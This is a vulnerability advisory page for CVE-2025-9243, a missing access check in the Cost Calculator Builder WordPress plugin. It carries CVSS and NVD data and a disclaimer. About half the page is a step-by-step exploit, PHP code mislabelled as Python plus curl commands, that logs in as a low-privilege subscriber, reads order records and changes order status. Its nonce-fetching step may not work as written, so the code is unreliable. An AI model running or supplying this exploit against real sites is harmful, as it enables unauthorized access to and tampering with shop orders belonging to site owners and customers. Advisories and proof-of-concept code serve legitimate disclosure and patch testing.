Security Vulnerability Report
中文
CVE-2025-9243 CVSS 8.1 HIGH

CVE-2025-9243

Published: 2025-10-04 03:15:39
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Cost Calculator Builder plugin for WordPress is vulnerable to unauthorizedmodification of data due to a missing capability check on the get_cc_orders and update_order_status functions in all versions up to, and including, 3.5.32. This makes it possible for authenticated attackers, with Subscriber-level access and above, to access order management functions and modify order status.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

WordPress Cost Calculator Builder < 3.5.32
WordPress Cost Calculator Builder <= 3.5.32

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php /** * CVE-2025-9243 PoC - Cost Calculator Builder Broken Access Control * Affected: Cost Calculator Builder <= 3.5.32 * Vulnerability: Missing capability check on get_cc_orders and update_order_status */ // Exploit via WordPress AJAX endpoint // Requires: Authenticated Subscriber-level account $target_url = 'https://target-wordpress-site.com'; $username = 'subscriber_user'; $password = 'user_password'; // Step 1: Login to obtain authentication cookies and nonce $login_url = $target_url . '/wp-login.php'; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $login_url); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([ 'log' => $username, 'pwd' => $password, 'wp-submit' => 'Log In', 'redirect_to'=> $target_url . '/wp-admin/', 'testcookie' => '1' ])); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt'); curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt'); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); $response = curl_exec($ch); // Step 2: Fetch a valid nonce from admin page (or use AJAX nonce) $admin_page = $target_url . '/wp-admin/admin-ajax.php?action=rest-nonce'; curl_setopt($ch, CURLOPT_URL, $admin_page); curl_setopt($ch, CURLOPT_HTTPGET, true); $nonce = trim(curl_exec($ch)); // Step 3: Exploit - Call get_cc_orders (unauthorized order access) $ajax_url = $target_url . '/wp-admin/admin-ajax.php'; curl_setopt($ch, CURLOPT_URL, $ajax_url); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([ 'action' => 'get_cc_orders', 'nonce' => $nonce ])); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); echo "[+] Fetching orders (should be admin-only):\n"; echo curl_exec($ch) . "\n"; // Step 4: Exploit - Call update_order_status (unauthorized status modification) curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([ 'action' => 'update_order_status', 'order_id'=> '1', 'status' => 'completed', // Change to any status: pending, processing, completed, cancelled 'nonce' => $nonce ])); echo "[+] Modifying order status (should be admin-only):\n"; echo curl_exec($ch) . "\n"; curl_close($ch); ?> # Alternative: curl command-line exploitation # Step 1: Login and store cookies curl -c cookies.txt -b cookies.txt \ -d "log=subscriber_user&pwd=password&wp-submit=Log+In&redirect_to=/wp-admin/&testcookie=1" \ https://target-wordpress-site.com/wp-login.php # Step 2: Get nonce NONCE=$(curl -b cookies.txt -s https://target-wordpress-site.com/wp-admin/admin-ajax.php?action=rest-nonce) # Step 3: Exploit get_cc_orders curl -b cookies.txt -d "action=get_cc_orders&nonce=$NONCE" \ https://target-wordpress-site.com/wp-admin/admin-ajax.php # Step 4: Exploit update_order_status curl -b cookies.txt -d "action=update_order_status&order_id=1&status=completed&nonce=$NONCE" \ https://target-wordpress-site.com/wp-admin/admin-ajax.php

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-9243", "sourceIdentifier": "[email protected]", "published": "2025-10-04T03:15:38.613", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Cost Calculator Builder plugin for WordPress is vulnerable to unauthorizedmodification of data due to a missing capability check on the get_cc_orders and update_order_status functions in all versions up to, and including, 3.5.32. This makes it possible for authenticated attackers, with Subscriber-level access and above, to access order management functions and modify order status."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3371684/cost-calculator-builder#file388", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3371684/cost-calculator-builder#file389", "source": "[email protected]"}, {"url": "https://research.cleantalk.org/cve-2025-9243/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/aa46bdb3-6bbe-4f2f-8e1a-fbb54c5b39fd?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.